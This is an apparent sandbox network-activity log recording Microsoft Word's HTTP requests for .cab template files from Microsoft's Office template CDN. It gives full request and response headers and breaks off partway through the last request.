    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19893
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
    Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
    ETag: 0x8D36AC8888436CF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8b7f2b9c-601e-00da-3797-a013cb000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328972.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21111
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49A0B8087
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 61a54fca-701e-0020-6497-a054a5000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328975.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22594
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
    Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
    ETag: 0x8D36AC889183E51
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428ca147-801e-0139-1997-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328983.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21875
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
    ETag: 0x8D36AC88963C8B3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 719e0bb9-a01e-0053-5c97-a0a91e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328986.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22340
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A9463F7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 954c7b2e-e01e-0048-5b97-a00af4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328990.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 19288
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A1DF716
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:25 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328998.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21357
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: l/W3t+nhKBmZRopcQssS5w==
    Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
    ETag: 0x8D36AC88A7F05EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:25 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 295527
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
    Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
    ETag: 0x8D60DFAA9FC6013
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 9ae01919-001e-0028-0a97-a0eb82000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 276650
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
    Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
    ETag: 0x8D60DDB82865741
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 271273
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
    Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
    ETag: 0x8D60DDB967B9FA5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7297223a-101e-00d5-6197-a070b4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 261258
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
    Last-Modified: Wed, 29 Aug 2018 18:23:56 GMT
    ETag: 0x8D60DDC9562A996
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 7b3a04c7-701e-00c5-3897-a04652000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2591108
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: vrEqBGTQlsozuupDUs6ADw==
    Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
    ETag: 0x8D60DDBDA502B66
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8dbaa68b-901e-00e1-2b97-a0566f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 550906
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
    Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
    ETag: 0x8D60DDC2BE7DF3C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a2e8f81c-101e-0034-3f97-a0b9e2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 640684
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
    Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
    ETag: 0x8D60DDB5C4DB3A1
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 222992
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
    Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
    ETag: 0x8D60DDC26100537
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6340fd72-201e-0152-6397-a008cf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1065873
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
    Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
    ETag: 0x8D60DDB6BA6E455
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 035d76e5-001e-0155-6297-a064ac000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03998158.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 42788
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IaS3txYxwszaX7umN1Hw0g==
    Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
    ETag: 0x8D36AC8BD065412
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 428ca141-801e-0139-1397-a08f3b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1310275
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
    Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
    ETag: 0x8D60DDBA5EDDA1A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 30476c6f-401e-000a-4097-a021e0000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2527736
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8laspQm0xsAUTSeMcDawqA==
    Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
    ETag: 0x8D60DDBDD02F94A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1766185
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: go+WAx9Av468teUqrut+TA==
    Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
    ETag: 0x8D60DDC4354B7FB
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d0d6cad7-401e-0109-1e97-a031f4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3256855
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
    ETag: 0x8D60DDBFE4BB50C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6efd8084-101e-00b2-7c97-a0755b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:25 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
